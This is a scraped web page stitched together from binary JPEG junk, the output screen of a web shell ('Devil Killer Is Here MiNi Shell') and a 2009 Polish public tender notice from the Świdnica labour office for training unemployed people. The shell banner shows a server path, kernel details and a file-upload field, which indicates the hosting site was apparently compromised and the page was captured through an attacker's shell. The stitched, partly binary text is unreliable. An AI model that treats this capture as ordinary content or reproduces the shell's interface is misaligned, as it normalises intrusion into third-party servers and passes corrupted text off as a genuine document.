JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090423/117740-N-2009.html

<p class="kh_header"><b>Świdnica: Szkolenia grupowe dla osób bezrobotnych finansowane z Funduszu Pracy</b><br>
<b>Numer ogłoszenia: 117740 - 2009; data zamieszczenia: 23.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. M. Skłodowskiej-Curie 5, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8561818, faks 074 8561813.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.praca.swidnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia grupowe dla osób bezrobotnych finansowane z Funduszu Pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń grupowych finansowanych ze środków Funduszu Pracy dla 56 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Świdnicy.

Zajęcia teoretyczne oraz praktyczne muszą być przeprowadzone na terenie miasta Świdnicy, z wyłączeniem zajęć praktycznych zamówienia wymienionego w Części 2, bowiem w tej części zamówienia zajęcia praktyczne muszą zostać zorganizowane w miejscowości Strzegom.

CPV - 80.40.00.00-8 usługi edukacji osób dorosłych oraz inne

Zamówienie podzielono na 3 części.
CZĘŚĆ 1
Wizaż i stylizacja paznokci z podstawami prowadzenia działalności gospodarczej - 16 osób

Szkolenie musi rozpocząć się w dniu 01.06.2009 r. oraz zakończyć w dniu 07.07.2009 r.

Program szkolenia powinien zawierać m.in. następujące zagadnienia
1)Dermatologiczne schorzenia dłoni
2)Manicure tradycyjny i biologiczny
3)Metody przedłużania paznokci
4)Zdobnictwo paznokci
5)ABC działalności gospodarczej
6)Umiejętność poszukiwania i pozyskiwania zatrudnienia

Minimalna ilość godzin jednej grupy szkoleniowej przeznaczona na realizację powyższych zagadnień:
Łączna liczba godzin na jednego uczestnika szkolenia: 180 godzin zegarowych, w tym:
1.zajęć teoretycznych: 35 godz. zegarowych, z czego 5 godz. zegarowych przypada na zajęcia z umiejętności poszukiwania zatrudnienia,
2.zajęć praktycznych: 145 godz. zegarowych.

Wskazana przez Zamawiającego ilość godzin nie obejmuje czasu przeprowadzenia egzaminu końcowego.

Za godzinę zegarową kursu należy przyjąć 60 minut, które obejmują zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut, gdyż długość przerw może być ustalana w sposób elastyczny.

Szkolenie musi trwać przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu oraz nie mniej niż 6 godzin zegarowych i nie więcej niż 8 godzin zegarowych dziennie, przy czym liczba godzin szkolenia w miesiącu kalendarzowym przypadająca na jednego uczestnika szkolenia nie może wynosić mniej niż:
150 godzin zegarowych w pierwszym miesiącu szkolenia, 
30 godzin zegarowych w drugim miesiącu szkolenia.
Ponadto Wykonawca zobowiązany jest do podania Zamawiającemu ilości godzin lekcyjnych przypadających na jednego uczestnika szkolenia w rozbiciu na poszczególne zagadnienia tematyczne szkolenia znajdujące odzwierciedlenie w druku zaświadczenia o ukończeniu kursu.

Wymagania:
Kurs przeznaczony jest dla osób bezrobotnych z wykształceniem minimum podstawowym.

Po zakończeniu szkolenia uczestnik szkolenia otrzyma:
zaświadczenie o ukończonym szkoleniu wydane przez organizatora szkolenia zgodnie z Rozporządzeniem Ministra Edukacji i Nauki.

Po zakończonym szkoleniu absolwent szkolenia powinien:
posiadać wiadomości z zakresu rozróżniania schorzeń dermatologicznych dłoni i paznokci,
znać podstawowe metody przedłużania paznokci oraz techniki ich zdobnictwa,
dobrać właściwą metodę przedłużania paznokci,
wykonywać zabiegi pielęgnacyjne dłoni,
udzielania porad z zakresu tematyki szkolenia.

Wymagania dotyczące wyposażenia w sprzęt i materiały: 
min. 8 stanowisk do samodzielnej nauki wizażu i stylizacji paznokci, tematyczne slajdy, filmy, tablice i plansze, atlasy dermatologiczne, foliogramy, aparatura i środki do sterylizacji i dezynfekcji, aparatura i narzędzia do manicure, preparaty i środki do manicure, min. 16 szt. pilników do paznokci, inne, w zależności od metod dobranych przez prowadzącego.

CZĘŚĆ 2
Technologie robót wykończeniowych w budownictwie (z docieplaniem budynków) - 10 osób

Szkolenie musi rozpocząć się w dniu 01.07.2009 r. oraz zakończyć w dniu 14.08.2009 r.

Program szkolenia powinien zawierać m.in. następujące zagadnienia:

Podstawowe zagadnienia BHP
Organizacja stanowiska roboczego
Murarz
Malarz
Tynkarz
Monter ścianek działowych i sufitów podwieszanych
Płytkarz - posadzkarz
Docieplanie budynków
Umiejętność poszukiwania i pozyskiwania zatrudnienia

Minimalna ilość godzin szkolenia przeznaczona na realizację powyższych zagadnień:
Łączna liczba godzin na jednego uczestnika szkolenia: 210 godzin zegarowych, w tym:
1.zajęć teoretycznych: 35 godz. zegarowych, z czego 5 godzin zegarowych przypada na zajęcia z umiejętności poszukiwania zatrudnienia,
2.zajęć praktycznych: 175 godz. zegarowych.

Wskazana przez Zamawiającego ilość godzin nie obejmuje czasu przeprowadzenia egzaminu końcowego.
Za godzinę zegarową kursu należy przyjąć 60 minut, które obejmują zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut, gdyż długość przerw może być ustalana w sposób elastyczny.

Szkolenie musi trwać przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu oraz nie mniej niż 6 godzin zegarowych i nie więcej niż 8 godzin zegarowych dziennie, przy czym liczba godzin szkolenia w miesiącu kalendarzowym przypadająca na jednego uczestnika szkolenia nie może wynosić mniej niż:
150 godzin zegarowych w pierwszym miesiącu szkolenia, 
60 godzin zegarowych w drugim miesiącu szkolenia.

Ponadto Wykonawca zobowiązany jest do podania Zamawiającemu ilości godzin lekcyjnych przypadających na jednego uczestnika szkolenia w rozbiciu na poszczególne zagadnienia tematyczne szkolenia znajdujące odzwierciedlenie w druku zaświadczenia o ukończeniu kursu.

Wymagania:
Kurs przeznaczony jest dla osób bezrobotnych z wykształceniem minimum podstawowym bez przeciwwskazań zdrowotnych do wykonywania danego zawodu (potwierdzonych stosownym zaświadczeniem i orzeczeniem lekarskim, w tym wysokościowym).

Po zakończeniu szkolenia uczestnik szkolenia otrzyma:
zaświadczenie o ukończonym szkoleniu wydane przez organizatora szkolenia zgodnie z Rozporządzeniem Ministra Edukacji i Nauki.
 
Po zakończonym szkoleniu absolwent powinien m.in.:
wykonywać prace malarskie,
kłaść tynki wewnętrzne, zewnętrzne, gładzie,
układać płytki ścienne i podłogowe,
układać panele ścienne i podłogowe,
stawiać ścianki działowe i sufity podwieszane,
docieplać budynki.

Wymagania dotyczące wyposażenia w sprzęt i materiały: 
narzędzia, materiały i urządzenia niezbędne do wykonywania prac budowlanych/wykończeniowych/ dociepleniowych, inne, w zależności od metod dobranych przez prowadzącego.

CZĘŚĆ 3
Kierowca wózków jezdniowych z napędem silnikowym z mechanicznym napędem podnoszenia z wymianą butli gazowych przy wózkach  - 30 osób w ramach 2 edycji piętnastoosobowych

Szkolenia dla poszczególnych grup szkoleniowych winny być zrealizowane w następujących terminach:
I GRUPA: 01.06.2009 - 30.06.2009
II GRUPA: 01.07.2009 - 31.07.2009

Program szkolenia powinien zawierać m.in. następujące zagadnienia:

Przepisy bhp i ppoż.
Typy i budowa wózków
Czynności operatora przy obsłudze wózków przed rozpoczęciem pracy
Czynności operatora przy obsłudze wózków w trakcie pracy
Czynności operatora przy obsłudze wózków po zakończeniu pracy wózka
Zagadnienia z ładunkoznawstwa
Bezpieczna obsługa i wymiana butli gazowych
Praktyczna nauka jazdy
Umiejętność poszukiwania i pozyskiwania zatrudnienia

Zagadnienia teoretyczne dotyczące obsługi wózków jezdniowych oraz część praktyczna muszą być zgodne z programem Ośrodka Doskonalenia Kadr Ministerstwa Gospodarki w Mysłowicach.

Minimalna ilość godzin szkolenia przeznaczona na realizację powyższych zagadnień:
Ogółem: 120 godzin zegarowych, w tym:
a)zajęć teoretycznych: 52 godz. zegarowe, z czego 5 godz. zegarowych przypada na zajęcia z zakresu umiejętności poszukiwania zatrudnienia,
b)zajęć praktycznych: 90 godz. lekcyjnych, czyli ok. 68 godz. zegarowych tj:
jazdy na wózkach - 75 godz. lekcyjnych, czyli ok. 56 godz. zegarowych i 30 minut (15 osób x 15 godz. = 225 / 3 osoby)
wymiana butli - 15 godz. lekcyjnych, czyli ok. 11 godz. zegarowych i 30 minut (3 grupy pięcioosobowe x 5 osób).
Na jednego uczestnika szkolenia przypada 67 godzin zegarowych, w tym:
a)zajęć teoretycznych: 52 godz. zegarowe, z czego 5 godz. zegarowych przypada na umiejętność poszukiwania zatrudnienia,
b)zajęć praktycznych: 20 godz. lekcyjnych, czyli ok. 15 godz. zegarowych 

Wskazana przez Zamawiającego ilość godzin nie obejmuje czasu przeprowadzenia egzaminu końcowego.

Za godzinę zegarową kursu należy przyjąć 60 minut, które obejmują zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut, gdyż długość przerw może być ustalana w sposób elastyczny.

Szkolenie z zakresu zajęć teoretycznych (każdej grupy szkoleniowej) musi trwać przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu oraz nie mniej niż 6 godzin zegarowych i nie więcej niż 8 godzin zegarowych dziennie, natomiast z zakresu zajęć praktycznych - zgodnie z programem Ośrodka Doskonalenia Kadr Ministerstwa Gospodarki w Mysłowicach. 
Liczba godzin szkolenia (każdej grupy szkoleniowej) przypadająca na jednego uczestnika szkolenia nie może wynosić mniej niż 67 godzin zegarowych w miesiącu kalendarzowym.

Ponadto Wykonawca zobowiązany jest do podania Zamawiającemu ilości godzin lekcyjnych przypadających na jednego uczestnika szkolenia w rozbiciu na poszczególne zagadnienia tematyczne szkolenia znajdujące odzwierciedlenie w druku zaświadczenia o ukończeniu kursu.

Wymagania:
Kurs przeznaczony jest dla osób bezrobotnych z wykształceniem min. podstawowym bez przeciwwskazań zdrowotnych i psychologicznych do wykonywania danego zawodu (potwierdzonych stosownym zaświadczeniem i orzeczeniem lekarskim).

Po zakończeniu szkolenia uczestnik szkolenia otrzyma:
1.zaświadczenie o ukończonym szkoleniu wydane przez organizatora szkolenia zgodnie z Rozporządzeniem Ministra Edukacji i Nauki,
2.certyfikat wydany w języku angielskim,
3.zaświadczenie potwierdzające posiadanie kwalifikacji zawodowych (druk zgodny z załącznikiem Nr 2 do Rozporządzenia Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych Dz. U. Nr 31 poz. 216),
4.dodatkowy certyfikat potwierdzający jakość szkolenia wydany przez niezależną instytucję,
5.uprawnienia dla kierowcy wózka jezdniowego podnośnikowego z napędem silnikowym wydane przez Urząd Dozoru Technicznego.

Po zakończonym szkoleniu absolwent szkolenia powinien m.in.:
1)znać charakterystykę i podział wózków jezdniowych napędzanych,
2)posiadać wiadomości z zakresu przepisów bhp i ppoż. oraz Urzędu Dozoru Technicznego,
3)posiadać umiejętności niezbędne do samodzielnego prowadzenia wózków i wykonywania operacji manewrowych osprzętem wózka oraz jego obsługi i wymiany butli gazowych.

Wymagania dotyczące wyposażenia w sprzęt i materiały: 
min. 2 stanowiska do nauki jazdy i manewrowania wózkami jezdniowymi z napędem silnikowym: jeden wózek podnośnikowy (dopuszczony do jazdy przez Dozór Techniczny) i jeden wózek naładowny (wózki muszą być sprawne technicznie), plac manewrowy z halą do nauki jazdy na wózkach jezdniowych z napędem silnikowym, odtwarzacz DVD lub magnetowid, telewizor, projektor multimedialny, tematyczne filmy wideo lub płyty CD/DVD do zajęć, plansze tematyczne, przekrojowe modele, rzutniki do przeźroczy, inne, w zależności od metod dobranych przez prowadzącego.

INFORMACJE UZUPEŁNIAJĄCE:
1)Wykonawca wyda uczestnikom szkolenia:
a)zaświadczenie o ukończonym szkoleniu wydane przez organizatora szkolenia zgodnie z Rozporządzeniem Ministra Edukacji i Nauki - dla zamówień od Części 1 do Części 3,
b)certyfikat wydany w języku angielskim - dla zamówienia wymienionego w Części 3,
c)zaświadczenie potwierdzające posiadanie kwalifikacji zawodowych (druk zgodny z załącznikiem Nr 2 do Rozporządzenia Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych Dz. U. Nr 31 poz. 216 zał. Nr 2) - dla zamówienia wymienionego w Części 3,
d)dodatkowy certyfikat potwierdzający jakość szkolenia wydany przez niezależną instytucję - dla zamówienia wymienionego w Części 3,
w terminie do 3 dni roboczych od daty zakończenia szkolenia/każdej grupy szkoleniowej, za wyjątkiem:
e)uprawnienia dla kierowcy wózka jezdniowego podnośnikowego z napędem silnikowym wydane przez Urząd Dozoru Technicznego - dla zamówienia wymienionego w Części 3, które zostaną wydane przez Instytucję uprawnioną, w terminie do 30 dni kalendarzowych licząc od daty zakończenia szkolenia.
2)Wykonawca w trakcie trwania szkolenia musi zapewnić uczestnikom szkolenia warunki  zgodnie z przepisami bezpieczeństwa i higieny pracy.
3)Zajęcia dydaktyczne muszą być realizowane od poniedziałku do piątku (z wyłączeniem sobót i niedziel oraz dni świątecznych).
a)zajęcia teoretyczne muszą rozpocząć się nie wcześniej niż o godz. 800, trwać nie krócej niż 6, a nie dłużej niż 8 godzin zegarowych dziennie oraz zakończyć się nie później niż o godz. 2000,
b)zajęcia praktyczne przypadające na jednego uczestnika szkolenia muszą rozpocząć się nie wcześniej niż o godz. 800, trwać nie krócej niż 6, a nie dłużej niż 8 godzin zegarowych dziennie oraz zakończyć się nie później niż o godz. 2005 (nie dotyczy zamówienia określonego w Części 1),
c)dzienna liczba godzin zegarowych - nie więcej niż 8.
W przypadku zamówienia określonego w Części 1:
a)zajęcia praktyczne szkolenia muszą rozpocząć się nie wcześniej niż o godz. 800, trwać nie krócej niż 6, a nie dłużej niż 8 godzin zegarowych dziennie oraz zakończyć się nie później niż o godz. 2000,
b)liczba uczestników szkolenia przypadająca na jedno stanowisko praktycznej nauki zawodu wynosi 2 osoby. Dopuszczalne jest to wyłącznie w przypadku tych modułów tematycznych, w których są praktyczne ćwiczenia na sprzęcie niezbędnym do wykonywania zawodu lub nabywania umiejętności, których zdobycie jest przedmiotem szkolenia. 
W przypadku zamówienia określonego w Części 3, organizacja szkolenia:
a)w zakresie zajęć teoretycznych musi odbywać się w formie kursu obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu (na jednego uczestnika szkolenia),
b)w zakresie zajęć praktycznych - zgodnie z programem Ośrodka Doskonalenia Kadr Ministerstwa Gospodarki w Mysłowicach.
4)Wykonawca przed rozpoczęciem szkolenia, jest zobowiązany zapoznać uczestników z jego szczegółowym programem oraz przekazać im harmonogram realizowanych zajęć.
5)Każdy uczestnik otrzyma na własność skrypt oraz podstawowe materiały piśmienne potrzebne do prowadzenia notatek (zeszyt/notatnik, długopis)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1 W postępowaniu o udzielenie zamówienia publicznego mogą wziąć udział Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 i nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 Prawa Zamówień Publicznych tj.:

- Zarówno zajęcia teoretyczne, jak i praktyczne powinni prowadzić wykładowcy posiadający uprawnienia do wykonywania zawodu instruktora/wykładowcy. Osoby prowadzące zajęcia muszą posiadać odpowiednią wiedzę oraz przygotowanie merytoryczne do prowadzenia zajęć powierzonych im przez Wykonawcę. Wykładowcy winni dysponować stosownymi dokumentami (np. certyfikaty, świadectwa, zaświadczenia, dyplomy, itp.), które potwierdzą kwalifikacje i uprawnienia kadry szkoleniowej. Każdy wykładowca musi mieć doświadczenie praktyczne w zakresie prowadzonych zajęć grupowych tj. przeprowadził co najmniej 2 szkolenia grupowe w ciągu ostatnich  3 lat.

- Wykonawca musi prowadzić działalność w zakresie będącym przedmiotem zamówienia oraz posiadać:
1.zaktualizowany na 2009 r., w Dziale 2 pt. Tematyka prowadzonych szkoleń w bieżącym roku kalendarzowym o dane szkolenie/a, na które Wykonawca zamierza złożyć ofertę, wpis do rejestru instytucji szkoleniowych prowadzony przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej (Rozporządzenie Ministra Gospodarki i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji szkoleniowych Dz. U. Nr 236, poz. 2365). Uwierzytelnioną kserokopię wpisu do rejestru należy dołączyć do oferty szkoleniowej. Ponadto, Wykonawca powinien złożyć oświadczenie mówiące o tym, że zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych wydane przez wojewódzki urząd pracy jest aktualne w roku bieżącym, co jest jednoznaczne z tym, iż Wykonawca nadal prowadzi działalność szkoleniową,
2.certyfikaty jakości usług, jeżeli Wykonawca takie posiada. Certyfikat jakości usług może dotyczyć zarówno kierunku szkolenia, na które Wykonawca złoży ofertę, jak również Wykonawcy, jako instytucji świadczącej usługi szkoleniowe. Będą brane pod uwagę różne typy certyfikatów: Certyfikaty Systemu Zarządzania Jakością ISO, akredytacje np. Kuratora Oświaty, Polskiego Towarzystwa Informatycznego, Polskiego Biura Europejskiego Certyfikatu Umiejętności Komputerowych, atesty, TÜV, itp.

- dysponować odpowiednimi warunkami lokalowymi i wyposażeniem dydaktycznym. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż dysponuje pomieszczeniami wykładowymi, których liczba i pojemność jest adekwatna do liczby części, których dotyczy złożona oferta oraz uwzględnia wielkość grup szkoleniowych danej części zamówienia, jak również harmonogram zajęć. Wykonawca w opisie warunków szkolenia winien dokładnie podać miejsce realizacji zajęć teoretycznych oraz praktycznych i w sposób szczegółowy opisać wyposażenie sal, w których prowadzone będą zajęcia dydaktyczne. Aby umożliwić uczestnikom szkolenia właściwe przygotowanie praktyczne Wykonawca winien zapewnić odpowiednią ilość sprzętów oraz materiałów niezbędnych do przeprowadzenia zajęć. Dlatego też należy odznaczyć jaki sprzęt i materiały będą wykorzystywane podczas zajęć oraz w jakich ilościach.

2 Zamawiający oceni, czy Wykonawca spełnia warunki, o których mowa w pkt. 1 na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy  i na podstawie złożonych wraz z ofertą dokumentów żądanych przez Zamawiającego potwierdzających spełnianie tych warunków, o których mowa w pkt. 6 SIWZ
3 Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie Wykonawca spełnia lub nie spełnia poszczególne warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Aktualny odpis  z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony  nie wcześniej niż 6 miesięcy przed upływem terminu  składania ofert.
2.W przypadku gdy o udzielenie zamówienia będzie ubiegała się wykonawca którego siedziba lub miejsce zamieszkania jest poza terytorium Rzeczpospolitej Polskiej zamiast dokumentu wskazanego w pkt. 1 składa dokument wystawiony w kraju w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony  nie wcześniej niż 6 miesięcy przed upływem terminu  składania ofert.
3.Uwierzytelnioną kopię zaktualizowanego na 2009r. W Dziale 2 pt. Tematyka prowadzonych szkoleń w bieżącym roku kalendarzowych o dane szkolenie/a, na które Wykonawca zamierza złożyć ofertę, wpisu do rejestru instytucji szkoleniowych prowadzony przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej (Rozporządzenie Ministra Gospodarki i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji szkoleniowych Dz. U. Nr 236 poz. 2365).  Ponadto, Wykonawca powinien złożyć oświadczenie mówiące o tym, że zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych wydawane przez wojewódzki urząd pracy jest aktualne w roku bieżącym, co jest jednoznaczne z tym, iż Wykonawca w roku bieżącym nadal prowadzi działalność szkoleniową.
4.Certyfikaty jakości usług, jeżeli Wykonawca takie posiada. Certyfikat jakości usług może dotyczyć zarówno kierunku szkolenia, na które Wykonawca złoży ofertę, jak również Wykonawcy, jako instytucji świadczącej usługi szkoleniowe. Będą brane pod uwagę różne formy certyfikatów: Certyfikaty Systemu Zarządzania Jakością ISO, akredytacje np. Kuratora Oświaty, Polskiego Towarzystwa Informatycznego, Polskiego Biura Europejskiego Certyfikatu Umiejętności Komputerowych, atesty, TÜV, itp.
5.Wykaz  niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca (np. ilość sprzętu, informacja czy obiekt jest przystosowany dla osób niepełnosprawnych). W przypadku wskazania narzędzi i urządzeń którymi będzie dysponował wykonawca należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń. Wykaz taki należy załączyć do każdej części zamówienia na które składana jest oferta uwzględniając specyfikę poszczególnych kierunków szkoleń.
6.Wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia   i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
7.pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonywania zamówienia, jeżeli w wykazie, o którym mowa w pkt 6 wykonawca wskazał osoby, którymi będzie dysponował.
			
Dokumenty winny być przedstawione w postaci oryginałów lub kserokopii poświadczonych za zgodność  z oryginałem przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - certyfikat jakości usług lub inny dokument - 15</li>
<li>3 - kwalifikacje kadry dydaktycznej - 10</li>
<li>4 - doświadczenie kadry dydaktycznej - 25</li>
